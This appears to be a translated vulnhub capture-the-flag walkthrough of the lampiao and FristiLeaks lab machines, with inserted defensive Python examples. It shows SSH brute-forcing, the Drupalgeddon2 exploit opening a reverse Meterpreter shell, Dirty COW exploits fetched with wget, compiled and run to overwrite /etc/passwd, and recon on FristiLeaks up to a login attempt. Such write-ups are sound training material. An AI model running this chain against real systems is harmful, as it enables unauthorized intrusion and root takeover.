vulnhub penetration-testing practice: lampiao & FristiLeaks

lampiao

The image is here; it is a virtual machine provided by vulnhub. Open it in VMware and the penetration test begins.

Host discovery

First, host discovery. Since the target's IP address is unknown, I scanned with nmap. Here I scanned the C-class range of the VM's virtual NIC with nmap -sn 192.168.0.0/16; the result is as follows:

(screenshot: subnet scan results)

We can see that the target host's IP address should be 192.168.253.130.

Port scanning

Next, port-scan this IP (I switched the VM's network mode to bridged, so the IP changed to 192.168.1.100). First the common ports:

nmap -v -sV --top-ports 3674 192.168.1.100
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http?

This gives two open services: ssh, and a web server on port 80. Details of the ssh service can be probed with msf's auxiliary/scanner/ssh/ssh_version:

msf > search ssh
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ssh/ssh_version normal SSH Version Scanner
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.1.100
rhosts => 192.168.1.100
msf auxiliary(scanner/ssh/ssh_version) > exploit
[+] 192.168.1.100:22 - SSH server version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.7 ( service.version=6.6.1p1 openssh.comment=Ubuntu-2ubuntu2.7 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=14.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

No other useful information came out of that. I tried password brute-forcing with hydra; nothing was found with the bundled wordlist, and a crunch-generated wordlist gave no result either, so this path looks like a dead end:

hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -V -t 10 ssh://192.168.1.100
-V shows each attempt as it runs; -t sets the number of parallel tasks

Turning to the web page on port 80: it is a static page. nikto found nothing, and directory scans with dirb and Yujian (御剑) found nothing either, emmm, awkward. Could the service be sitting on some obscure port? So I re-ran the port scan, this time with:

root@kali:~# sudo nmap -v -sS -sV -Pn -p 1-65535 192.168.1.100
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http?
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:14:89:32 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 1898 is also running a web service, promising. Visiting it shows:

(screenshot: homepage)
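The lesson of the two scans above is that a top-ports scan missed the service on 1898 and only the full 1-65535 scan caught it. The following is an added example, not part of the original write-up: it parses nmap normal output, reports what the quick scan missed relative to the full scan, and flags anything that is not in a documented service baseline, which is how a defender would turn the same scans into an inventory check. Both scan texts are constructed samples modelled on the output shown above, and the baseline set is an assumption for the demo.

```python
"""Compare a quick (top-ports) nmap scan with a full-range scan and flag
anything outside an expected service baseline.

Added example, not part of the original write-up. The two inputs are
constructed samples in nmap's normal-output format, modelled on the scans
shown above; the baseline of expected ports is an assumption for the demo.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One "PORT STATE SERVICE VERSION" row of nmap normal output, e.g.
# "1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))"
PORT_ROW = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


@dataclass(frozen=True)
class OpenPort:
    port: int
    proto: str
    service: str
    version: str


def parse_nmap_output(text: str) -> list[OpenPort]:
    """Return the open ports listed in nmap normal output; other lines are ignored."""
    found = []
    for line in text.splitlines():
        m = PORT_ROW.match(line.strip())
        if m and m.group("state") == "open":
            found.append(OpenPort(int(m.group("port")), m.group("proto"),
                                  m.group("service"), (m.group("version") or "").strip()))
    return found


def ports_missed_by_quick_scan(quick: list[OpenPort], full: list[OpenPort]) -> list[OpenPort]:
    """Open ports the full-range scan saw that the quick scan did not."""
    seen = {(p.port, p.proto) for p in quick}
    return [p for p in full if (p.port, p.proto) not in seen]


def unexpected_services(ports: list[OpenPort], baseline: set[tuple[int, str]]) -> list[OpenPort]:
    """Open ports that are not in the asset's documented baseline."""
    return [p for p in ports if (p.port, p.proto) not in baseline]


# Constructed sample: output of the --top-ports scan shown in the write-up.
QUICK_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http?
"""

# Constructed sample: output of the later -p 1-65535 scan.
FULL_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http?
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:14:89:32 (VMware)
"""

# Assumed baseline: the services this host is documented to expose.
BASELINE = {(22, "tcp"), (80, "tcp")}

if __name__ == "__main__":
    quick, full = parse_nmap_output(QUICK_SCAN), parse_nmap_output(FULL_SCAN)
    for p in ports_missed_by_quick_scan(quick, full):
        print(f"missed by quick scan: {p.port}/{p.proto} {p.service} {p.version}")
    for p in unexpected_services(full, BASELINE):
        print(f"not in baseline: {p.port}/{p.proto} {p.service} {p.version}")
```

Running it lists 1898/tcp under both headings: the quick scan never saw it, and it is not in the baseline. In practice the baseline would come from the asset register, and any port reported by `unexpected_services` is either an undocumented service to be recorded or something to investigate.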

Browsing the site, the main page only offers user login, registration and password recovery. Likely points of attack:

  • SQL injection in the pages
  • Account password cracking
  • Directory scanning
  • Drupal framework vulnerabilities

We intend to test the higher-impact framework vulnerabilities first; the common web vulnerabilities are tedious to test, and if the site has many pages it is not easy to find a foothold quickly. Scan the directories first:

root@kali:~# dirb http://192.168.1.100:1898 -o out
---- Scanning URL: http://192.168.1.100:1898/ ----
==> DIRECTORY: http://192.168.1.100:1898/includes/
+ http://192.168.1.100:1898/index.php (CODE:200|SIZE:11423)
==> DIRECTORY: http://192.168.1.100:1898/misc/
==> DIRECTORY: http://192.168.1.100:1898/modules/
==> DIRECTORY: http://192.168.1.100:1898/profiles/
+ http://192.168.1.100:1898/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://192.168.1.100:1898/scripts/
+ http://192.168.1.100:1898/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.1.100:1898/sites/
==> DIRECTORY: http://192.168.1.100:1898/themes/
+ http://192.168.1.100:1898/web.config (CODE:200|SIZE:2200)
+ http://192.168.1.100:1898/xmlrpc.php (CODE:200|SIZE:42)

As you can see, some directories and files were found; pick out what might be useful. The /modules/ path shows the installed modules, which may come in handy later; the /robots.txt file and xmlrpc.php may also be useful. Just a quick look for now.

Getting a shell

Next, try attacking the Drupal framework. Search for Drupal vulnerabilities:

msf > search drupal
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution

Here, we can actually see the update log from the robots.txt found earlier: Drupal 7.54, 2017-02-01. So we chose the newest module, drupal_drupalgeddon2, which seems to have been reported only recently. Using info to view the details, it turns out to be CVE-2018-7600. Searching online for the details of this vulnerability: "Drupal CVE-2018-7600 Analysis and PoC Construction".

A rough read: it is a remote code execution vulnerability. The root cause is that Drupal gives special treatment to variables whose names begin with #; during registration, malicious code can be passed in through such a variable and executed.
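The defensive counterpart of that root cause is to make sure request input can never carry a '#'-prefixed key into the render layer at all. What follows is an added example, not Drupal's own code: a small PHP-style nested query parser (PHP turns mail[address]=x into a nested array, which is why user input can reach nested keys) plus a recursive filter that drops every '#'-prefixed key at any depth and records what it removed for logging. The query string is constructed and its key names (name, mail, #attr, tags) are made up for the demo.

```python
"""Sanitise untrusted request parameters before they reach a renderer that
gives '#'-prefixed keys special meaning, as Drupal's Form API does.

Added example, not Drupal's code: a PHP-style nested query parser plus a
recursive filter that drops '#'-prefixed keys and records what it removed,
written from scratch to show the defensive idea. SAMPLE_QUERY is constructed
and its key names are made up for the demo.
"""
from urllib.parse import parse_qsl


def _split_key(key: str) -> list:
    """'mail[address][]' -> ['mail', 'address', ''] (PHP bracket notation)."""
    head, _, rest = key.partition("[")
    parts = [head]
    if rest:
        parts += [p.rstrip("]") for p in ("[" + rest).split("[")[1:]]
    return parts


def parse_php_query(qs: str) -> dict:
    """Parse a query string into nested dicts the way PHP builds $_GET/$_POST."""
    root: dict = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        parts = _split_key(key)
        node = root
        for part in parts[:-1]:
            part = part or str(len(node))          # '[]' means "next index"
            child = node.get(part)
            if not isinstance(child, dict):        # scalar in the way: replace it
                child = node[part] = {}
            node = child
        leaf = parts[-1] or str(len(node))
        node[leaf] = value
    return root


def strip_hash_keys(data, path: str = "", removed=None):
    """Return (clean_copy, removed_paths). Every dict key beginning with '#'
    is dropped at any depth, so user input cannot smuggle render instructions."""
    if removed is None:
        removed = []
    if isinstance(data, dict):
        clean = {}
        for k, v in data.items():
            kp = f"{path}[{k}]" if path else str(k)
            if isinstance(k, str) and k.startswith("#"):
                removed.append(kp)                 # worth logging: nobody sends these by accident
                continue
            clean[k], _ = strip_hash_keys(v, kp, removed)
        return clean, removed
    if isinstance(data, list):
        return [strip_hash_keys(v, f"{path}[{i}]", removed)[0] for i, v in enumerate(data)], removed
    return data, removed


# Constructed sample: an ordinary form submission with one '#'-prefixed key smuggled in.
SAMPLE_QUERY = "name=alice&mail[address]=alice%40example.test&mail[%23attr]=x&tags[]=a&tags[]=b"

if __name__ == "__main__":
    clean, removed = strip_hash_keys(parse_php_query(SAMPLE_QUERY))
    print("clean:", clean)
    print("removed:", removed)
```

The parser is only there to show where nested keys come from; the piece that matters is `strip_hash_keys`, which should run on GET, POST and cookie data before any application code sees them, and whose `removed` list is a good signal to forward to monitoring.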

msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.100
rhost => 192.168.1.100
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
rport => 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 192.168.1.103:4444
[*] Drupal 7 targeted at http://192.168.1.100:1898/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Sending stage (37775 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.100:54178) at 2018-09-04 09:19:16 +0800
meterpreter > shell
Process 3946 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$

Privilege escalation

With a shell, we check the kernel version with uname -a. The first thing to consider is the generic Linux kernel vulnerability Dirty COW:

 ~  searchsploit -tw dirty cow
------------------------------------------------------------------------------------------ --------------------------------------------
Exploit Title | URL
------------------------------------------------------------------------------------------ --------------------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | https://www.exploit-db.com/exploits/43199/
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | https://www.exploit-db.com/exploits/44305/
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege | https://www.exploit-db.com/exploits/40616/
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalatio | https://www.exploit-db.com/exploits/40847/
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Meth | https://www.exploit-db.com/exploits/40838/
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escala | https://www.exploit-db.com/exploits/40839/
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Metho | https://www.exploit-db.com/exploits/40611/
------------------------------------------------------------------------------------------ --------------------------------------------

So we then use CVE-2016-5195 for privilege escalation.

/proc/self/mem

We first use this one:

Linux Kernel 2.6.22 < 3.9 - ‘Dirty COW /proc/self/mem’ Race Condition Privilege Escalation (/etc/passwd Method)

It says <3.9, and at first I thought it could not be used because the kernel is 4.4, but in the end it worked. The vulnerability details can be looked up elsewhere and are not repeated here. First, download the exploit:

www-data@lampiao:/var/www/html$ wget https://www.exploit-db.com/download/40847.cpp
www-data@lampiao:/var/www/html$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
<tml$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
www-data@lampiao:/var/www/html$ ./dcow -s
./dcow -s
Running ...
Password overridden to: dirtyCowFun
Received su prompt (Password: )
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak

and root is obtained.

PTRACE_POKEDATA

Likewise we can use:

Linux Kernel 2.6.22 < 3.9 - ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)

www-data@lampiao:/var/www/html$ wget https://www.exploit-db.com/download/40839.c
www-data@lampiao:/var/www/html$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
www-data@lampiao:/var/www/html$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123
Complete line:
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash
mmap: b7791000

Now we can switch to the firefart user and get the flag.
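Both /etc/passwd methods above leave the same kind of trace: a uid-0 account that is not root, and a password hash sitting inline in /etc/passwd instead of in /etc/shadow. The following is an added example, not part of the original write-up, showing the check an administrator or a host-integrity job would run to catch that. The passwd snippets are constructed; the firefart line is the one printed by the exploit above, and the root hash in the tampered copy is an obvious placeholder.

```python
"""Audit an /etc/passwd file for the kind of tampering the Dirty COW
/etc/passwd methods leave behind: an extra uid-0 account and a password hash
stored inline instead of in /etc/shadow, plus a diff against a known-good copy.

Added example, not part of the original write-up. The two passwd snippets are
constructed; the firefart line is the one shown in the exploit output above.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines; blank and comment lines are skipped, malformed lines raise."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"line {n}: expected 7 fields, got {len(f)}")
        entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
    return entries


def audit_passwd(entries) -> list:
    """Return human-readable findings for suspicious entries."""
    findings = []
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: uid 0 account other than root")
        if e.passwd == "":
            findings.append(f"{e.name}: empty password field")
        elif e.passwd not in ("x", "*", "!", "!!"):
            # Shadow-enabled systems keep only a marker here; a real hash means
            # someone wrote the file directly rather than going through passwd(1).
            findings.append(f"{e.name}: password hash stored in /etc/passwd, not /etc/shadow")
    return findings


def diff_passwd(baseline, current) -> dict:
    """Compare against a known-good copy: names added, removed, or changed."""
    before = {e.name: e for e in baseline}
    after = {e.name: e for e in current}
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "changed": sorted(n for n in set(before) & set(after) if before[n] != after[n]),
    }


# Constructed known-good copy (what a file-integrity baseline would hold).
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# Constructed post-exploitation copy: root's hash overridden (placeholder value)
# and the firefart line from the exploit output above appended.
TAMPERED_PASSWD = """\
root:HASH_PLACEHOLDER:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash
"""

if __name__ == "__main__":
    base, cur = parse_passwd(BASELINE_PASSWD), parse_passwd(TAMPERED_PASSWD)
    for finding in audit_passwd(cur):
        print("finding:", finding)
    print("diff:", diff_passwd(base, cur))
```

On a real host the baseline would be the copy kept by the integrity tool (or simply a checksum taken at build time), and `audit_passwd` alone is enough to alert without one, since neither condition it checks occurs on a correctly administered shadow-enabled system.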

FristiLeaks

The image is here; it is a virtual machine provided by vulnhub. Import it into VirtualBox; note that the MAC address must be changed to 08:00:27:A5:A6:76.

Host discovery

Here we switch to another tool, netdiscover, which is friendlier and faster than nmap for this.

root@kali:~# netdiscover -r 192.168.0.0/16
Currently scanning: Finished! | Screen View: Unique Hosts
10 Captured ARP Req/Rep packets, from 3 hosts. Total size: 600
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 8c:a6:df:27:b5:3c 8 480 TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.100 08:00:27:a5:a6:76 1 60 PCS Systemtechnik GmbH
192.168.1.103 00:24:9b:24:99:6b 1 60 Action Star Enterprise Co., Ltd.

The target IP is found to be 192.168.1.100. I also looked up what company the MAC vendor is; it really exists. Set that aside. Next, port scanning. Having learned the lesson last time, this time scan all ports directly.

Port scanning

root@kali:~# sudo nmap -v -sS -sV -Pn -p 1-65535 192.168.1.100
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

emmm, only port 80? You can't fool me; try again another way. emm, still nothing more. So let's look at this one. The homepage is a static page with nothing useful; scan the directories.

---- Scanning URL: http://192.168.1.103/ ----
+ http://192.168.1.103/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://192.168.1.103/images/
+ http://192.168.1.103/index.html (CODE:200|SIZE:703)
+ http://192.168.1.103/robots.txt (CODE:200|SIZE:62)

The useful ones should be robots.txt and cgi-bin. cgi-bin is not accessible (403), so look at robots.txt. It lists 3 paths: cola, sisi, beer. Visiting all three, each is just an image.

(screenshot: the image, captioned "calling the police")

Calm down, calm down. The image has a hint: fristi. Although it is a bit..., it gets us in: a login page. Look at the source first; a comment contains a string of base64, which decodes to an image.

(screenshot: the decoded image)

It looks like a password; together with the earlier eezeepz, try logging in.
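The base64-in-a-comment step above is worth automating, because it is exactly the kind of leak a pre-release source review should catch. The following is an added example, not part of the original write-up: it pulls every HTML comment, keeps the ones that are a pure base64 blob (whitespace inside the comment is ignored, so wrapped blobs are handled), decodes them and classifies the result by file signature. SAMPLE_HTML is constructed; the blob in it is a 1x1 PNG generated in the block itself, standing in for the image the FristiLeaks page hides in its source. Nothing from the real page is used.

```python
"""Pull base64 blobs out of HTML comments and identify what they decode to by
magic bytes, so a reviewer can see what a page is leaking without guessing.

Added example, not part of the original write-up. SAMPLE_HTML is constructed:
its comment holds a 1x1 PNG generated by tiny_png() below, standing in for
the image the FristiLeaks page hides in its source.
"""
import base64
import binascii
import re
import struct
import zlib

COMMENT = re.compile(r"<!--(.*?)-->", re.S)
BASE64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+=*")
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip",
}


def sniff(data: bytes) -> str:
    """Classify bytes by file signature; 'unknown' if no signature matches."""
    for sig, name in MAGIC.items():
        if data.startswith(sig):
            return name
    return "unknown"


def find_base64_in_comments(html: str, min_len: int = 64) -> list:
    """Return (kind, decoded_bytes) for every HTML comment that is a base64 blob.
    Ordinary developer comments fail the alphabet check and are skipped."""
    found = []
    for m in COMMENT.finditer(html):
        body = "".join(m.group(1).split())           # drop line wrapping inside the comment
        if len(body) < min_len or not BASE64_ALPHABET.fullmatch(body):
            continue
        try:
            data = base64.b64decode(body, validate=True)
        except binascii.Error:                        # right alphabet, wrong padding/length
            continue
        found.append((sniff(data), data))
    return found


def _chunk(tag: bytes, body: bytes) -> bytes:
    """PNG chunk: length, tag, body, CRC32 over tag+body."""
    return (struct.pack(">I", len(body)) + tag + body
            + struct.pack(">I", zlib.crc32(tag + body) & 0xFFFFFFFF))


def tiny_png() -> bytes:
    """A valid 1x1 black RGB PNG, used only to build the constructed sample."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, colour type 2 (RGB)
    scanline = b"\x00" + b"\x00\x00\x00"                   # filter byte + one pixel
    return (b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND", b""))


# Constructed sample page: one harmless developer comment, one wrapped base64 blob.
_b64 = base64.b64encode(tiny_png()).decode()
SAMPLE_HTML = (
    "<html><head><title>login</title></head><body>\n"
    "<!-- TODO: remove debug output before release -->\n"
    "<form method='post'><input name='user'><input name='pass'></form>\n"
    "<!--\n" + "\n".join(_b64[i:i + 40] for i in range(0, len(_b64), 40)) + "\n-->\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    for kind, data in find_base64_in_comments(SAMPLE_HTML):
        print(f"comment decodes to {kind}, {len(data)} bytes")
```

The `min_len` threshold keeps short words that happen to be valid base64 (a comment reading "TODO" would pass the alphabet test) from being reported; tune it down if the content you expect is small, and extend MAGIC if the signatures you care about are not listed.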